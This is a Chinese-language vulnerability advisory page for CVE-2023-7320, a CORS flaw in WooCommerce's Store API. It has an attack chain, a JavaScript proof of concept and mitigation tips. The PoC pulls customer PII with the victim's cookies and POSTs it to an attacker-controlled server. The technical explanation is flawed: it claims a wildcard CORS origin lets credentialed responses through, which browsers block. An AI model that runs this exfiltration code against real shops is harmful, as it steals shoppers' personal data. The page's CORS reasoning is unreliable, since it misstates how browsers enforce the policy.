CVE-2023-7320 WooCommerce敏感信息泄露漏洞

漏洞信息

漏洞编号

CVE-2023-7320

漏洞类型

敏感信息泄露

CVSS评分

5.3 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

WooCommerce WordPress Plugin

漏洞概述

CVE-2023-7320是WordPress最受欢迎的电商插件WooCommerce中的一个中危安全漏洞。该漏洞存在于WooCommerce的Store API REST端点中，由于CORS（跨域资源共享）策略配置不当，导致任何来源的外部请求都可以直接访问这些API端点。攻击者无需任何认证凭证，仅需构造跨域请求即可获取存储在WooCommerce中的用户敏感个人信息，包括姓名、地址、邮箱、电话等PII（个人身份信息）。此漏洞影响范围广泛，因为WooCommerce是全球使用量最高的WordPress电商插件之一，在数百万个WordPress网站中运行。虽然CVSS评分仅为5.3（中危），但由于涉及大量用户隐私数据的潜在泄露，且利用门槛极低，建议所有使用该插件的用户尽快采取修复措施。

技术细节

该漏洞的核心问题在于WooCommerce插件的Store API REST端点实现了过于宽松的CORS策略。具体来说，当浏览器发起跨域XMLHttpRequest或Fetch请求时，服务器端会在响应头中包含Access-Control-Allow-Origin: *，允许来自任意域名的JavaScript脚本访问这些API端点。这种配置在Store API的设计中可能是为了支持前端JavaScript应用的无状态请求，但未正确限制可信任的来源域名。攻击者只需在任意网站上放置一段简单的JavaScript代码，当用户访问该网站时，浏览器会自动携带用户的认证Cookie向目标WooCommerce站点的Store API发起请求。由于CORS策略允许跨域访问，浏览器会成功接收并返回API响应，其中包含该用户在WooCommerce中的敏感个人信息。攻击者通过document.location.href或fetch API即可将这些数据发送到远程服务器。整个攻击过程对用户完全透明，无需用户交互，也无需知道目标站点的具体结构。

攻击链分析

STEP 1

1.侦察阶段

攻击者识别目标网站是否使用WooCommerce插件及其版本，通过检查页面源代码或请求/wc-api/v3/products等端点确认

STEP 2

2.钓鱼页面部署

攻击者构建包含恶意JavaScript代码的钓鱼页面或在其他被控制的网站上嵌入PoC脚本，等待已登录目标站点的用户访问

STEP 3

3.跨域请求触发

当受害者访问钓鱼页面时，浏览器自动执行JavaScript代码，向目标WooCommerce站点的Store API发起携带Cookie的跨域请求

STEP 4

4.CORS策略绕过

由于目标站点的CORS配置允许Access-Control-Allow-Origin: *，浏览器允许JavaScript接收API响应内容

STEP 5

5.敏感数据提取

攻击者的脚本解析响应JSON，提取用户名、邮箱、地址、电话等PII信息

STEP 6

6.数据外传

将窃取的敏感信息通过HTTP POST请求发送到攻击者控制的远程服务器，完成数据外泄

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

// CVE-2023-7320 PoC - WooCommerce Store API CORS Information Disclosure
// This PoC demonstrates how an attacker can steal user PII from a vulnerable WooCommerce site

const TARGET_SITE = 'https://vulnerable-woocommerce-site.com';

async function exploitCORS() {
    try {
        // Attempt to access WooCommerce Store API endpoints
        const endpoints = [
            '/?rest_route=/wc/store/v1/customers/me',
            '/?rest_route=/wc/store/v1/customers',
            '/wp-json/wc/store/v1/customers/me'
        ];
        
        for (const endpoint of endpoints) {
            console.log(`[*] Trying endpoint: ${endpoint}`);
            
            const response = await fetch(TARGET_SITE + endpoint, {
                method: 'GET',
                credentials: 'include', // Include cookies for authenticated requests
                mode: 'cors' // Enable CORS request
            });
            
            if (response.ok) {
                const data = await response.json();
                console.log('[+] Success! Extracted data:');
                console.log(JSON.stringify(data, null, 2));
                
                // Extract PII fields
                const pii = {
                    email: data.email,
                    first_name: data.first_name,
                    last_name: data.last_name,
                    billing_address: data.billing,
                    shipping_address: data.shipping,
                    phone: data.billing?.phone
                };
                
                // Send stolen data to attacker's server
                await fetch('https://attacker-controlled-server.com/collect', {
                    method: 'POST',
                    headers: {'Content-Type': 'application/json'},
                    body: JSON.stringify(pii)
                });
                
                console.log('[+] PII data exfiltrated successfully');
                return pii;
            }
        }
    } catch (error) {
        console.error('[-] Exploitation failed:', error.message);
    }
    return null;
}

// Execute the exploit
// Note: This PoC requires the victim to be logged into the WooCommerce site
// and visit a page containing this script
exploitCORS();

影响范围

WooCommerce Plugin < 7.8.2

防御指南

临时缓解措施

在官方补丁发布之前，可通过以下临时措施缓解风险：1）在Web服务器层面（如Nginx/Apache）添加CORS限制规则，拒绝来自非预期域名的跨域请求；2）使用安全插件配置CORS策略白名单；3）限制Store API端点的IP访问范围；4）监控并记录所有对Store API的请求以便及时发现异常访问。但最有效的解决方案仍是尽快升级到WooCommerce的最新安全版本。